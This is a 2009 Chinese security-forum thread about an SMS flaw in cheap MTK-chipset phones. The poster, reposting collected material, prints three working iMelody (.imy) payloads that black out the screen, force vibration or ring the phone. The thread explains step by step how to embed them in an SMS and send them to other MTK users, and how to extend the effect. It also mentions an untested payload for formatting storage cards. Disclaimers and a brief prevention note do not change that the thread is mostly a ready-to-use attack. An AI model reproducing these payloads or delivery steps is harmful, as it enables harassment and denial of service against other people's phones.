关于MTK平台山寨机的恶意代码 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 硬件交流关于MTK平台山寨机的恶意代码

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

关于MTK平台山寨机的恶意代码

本主题由版主 ★蓝色羽毛★ 于 2009-1-24 12:22:16 执行主题置顶/取消操作

艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】	发表于： 2009-01-10 16:32 \| 显示全部短消息资料字号：小中大 1楼关于MTK平台山寨机的恶意代码 08年末的时候我的手机（山寨机）开始出现一些短信向下按便出现震动黑屏.. 关机都不管用而且在这期间来电都进不来只能拔电池...... 由于深受其害于是查找了相关信息与大家共享：用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon) 附件: 文件名:95831bd87143622932fa1c47.jpg 下载次数:2232 文件类型:image/pjpeg 文件大小: 上传时间:2009-1-10 16:31:42 描述:jpg 艾暖最后编辑于 2009-01-10 16:38:07
艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】	分享到：

艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】	发表于： 2009-01-10 16:39 \| 显示全部短消息资料字号：小中大 2楼回复: 关于MTK平台山寨机的恶意代码声明：以下所有信息全是在互联网上搜集整理得到的，本文旨在研究探讨技术问题，不涉及任何利益。漏洞的滥用有可能造成他人的损失，他人的这种行为与本人无关，请读者慎重。　　最近很热闹的事情就是MTK手机短信漏洞的曝光，由于购买使用MTK方案的手机现在在市场上占有不小的比重，而且此漏洞几乎对所有MTK手机都有效，个人用户基本不能防止或者补救，所以受影响的范围非常广。经过多方搜集整理，还有本人的测试，果然发现此漏洞真的屡试不爽，特此分享下。　　也许很多人在听到“MTK方案手机”时不知所云，其实这是正规的叫法。MTK方案手机指的是采用台湾联发科公司研制的MTK手机芯片的手机，由于价格低功能强，市场占有率很高，同时由于生产成本低廉，很多不知名品牌都可以进入手机制造的行业，因此使市场造成不小的混乱。一般我们都称之为“山寨手机”，具体的一个显著特征是屏幕是触摸屏，而且屏幕下方有一条灰色功能区，上面分布有四五个功能按键，具体见图： 95831bd87143622932fa1c47.jpg (18.71 K) 2009-1-10 16:31:42 　　看了图基本上我们就清楚什么是所谓的“MTK手机”了，既然明确了目标，那么下面就开始讲讲这个漏洞。一、被攻击时的状况：　　最近经常有人反映自己的在接到一条恶作剧短信后，手机出现黑屏、振动不止、响铃等状况，这就是最典型的漏洞特征。这类短信基本上都是先告诉你往下翻阅短信会出现黑屏等状况，有勇气的就翻吧。一般人都会以为是无聊人的无聊游戏，谁知道当往下翻真会出现所说的状况……
艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】

艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】	发表于： 2009-01-10 16:39 \| 显示全部短消息资料字号：小中大 3楼回复: 关于MTK平台山寨机的恶意代码二、漏洞代码：　　其实出现上面这些情况都是由于MTK手机支持的一种imy格式铃声引起的，在短信内容中加载不同的imy文件会造成不同的效果。这种imy文件的内容具体如下：（注意，代码为两行#之间的部分，不包括#） 1。黑屏 ########################### BEGIN:IMELODY BEAT:1200 MELODY:(ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600) END:IMELODY ########################### 2。猛震 ########################### BEGIN:IMELODY VERSION:1.2 FORMAT:CLASS1.0 BEAT:100 MELODY:(ledoffledonbackoffbackonvibeon@300) END:IMELODY ########################### 3。振铃 ########################### BEGIN:IMELODY VERSION:1.2 FORMAT:CLASS1.0 BEAT:200 MELODY:(ledoffbackoffvibeonr5vibeoffledonbackonr5@200) END:IMELODY ###########################
艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】

艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】	发表于： 2009-01-10 16:40 \| 显示全部短消息资料字号：小中大 4楼回复: 关于MTK平台山寨机的恶意代码三、漏洞使用方法　　这种短信漏洞的使用只能用于MTK手机上，也就是说必须是MTK手机编辑发送类似短信给其他的MTK手机，才能生效。所以首先，你必须有一部MTK手机才行。然后在电脑中打开记事本，把上面的相应的代码（两行#号之间的部分，不包含#号）粘贴进去，并存成后缀名为imy的文件，并且把imy文件放在手机的Audio文件夹内，一定注意是手机的文件夹，而非储存卡的。最后，开始在手机上编写短信（注意是短信，而非彩信），短信内容随意，编辑之后点“选项”——“插入对象”——“我的铃声”——选取刚才做好的imy文件，发送给同样是MTK手机的用户即可。　　编写imy文件时请注意，在“MELODY”那一行中有一个@符号，后面是一个数字，其实这个数字是作用时间。@后面的数字越大时间也就越长，自己看情况更改即可。时间单位是毫秒。
艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】

艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】	发表于： 2009-01-10 16:40 \| 显示全部短消息资料字号：小中大 5楼回复: 关于MTK平台山寨机的恶意代码四、漏洞分析　　看了前面的内容，也就清楚其实这个漏洞的精髓就是imy文件。据了解，imy文件是索爱最早支持的一种代码形式的单音节铃声，可以用代码调用手机的解码芯片发出一些声音甚至一些核心指令。所以代码里面如果是诸如黑屏、响铃等类似的命令，发送给对方后，一旦打开也就触发了这些命令，当然会造成相应的结果。目前看来，只要有人能够懂得这些代码的编写语言，发送格式化储存卡一类的短信应该是没有问题的。我手里就有一个格式化命令的imy文件，由于担心给他人造成不良后果，一直没有实验。
艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】

艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】	发表于： 2009-01-10 16:41 \| 显示全部短消息资料字号：小中大 6楼回复: 关于MTK平台山寨机的恶意代码五、实验情况及预防　　在我的实验过程中，我发现并非所有屏幕有灰色功能键的手机都能中招，也许这些手机使用的不是MTK方案吧。我推测，既然imy并非MTK手机专有格式，那么理论上所有支持imy铃声的手机都会中招。至于预防，我想这是很难的，毕竟只要触发就会中招，也许只能是看到类似的短信立即关闭，不继续翻阅从而避免激活imy文件代码，可能会有一些帮助。当然，这只是相对的，如果对方发送的短信是先插入的imy文件再写文字的话…… 　　再次声明，如果利用这个漏洞恶作剧一下也没什么，但是如果造成了相应损失，那么发送者就必须承担相应法律责任，请实验前一定慎重。而我在这里的文章只是在讨论漏洞本身，不涉及任何经济利益，因这个漏洞发生的任何损失与我无关。
艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】

艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】	发表于： 2009-01-10 16:41 \| 显示全部短消息资料字号：小中大 7楼回复：关于MTK平台山寨机的恶意代码 —————————————— 完成回小狮子：我不晓得
艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】

艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】	发表于： 2009-01-10 16:53 \| 显示全部短消息资料字号：小中大 8楼回复：关于MTK平台山寨机的恶意代码你没看到上面的话吗也是我搜集来的...
艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】

艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】	发表于： 2009-01-11 15:21 \| 显示全部短消息资料字号：小中大 9楼回复：关于MTK平台山寨机的恶意代码杰洛对于我这种山寨机用户请保留下意见
艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】

艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】	发表于： 2009-01-11 16:34 \| 显示全部短消息资料字号：小中大 10楼回复：关于MTK平台山寨机的恶意代码真照顾我..
艾暖社区嘉宾帖子:23642 注册: 2004-07-17 来自:逍遥谷【遥】

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT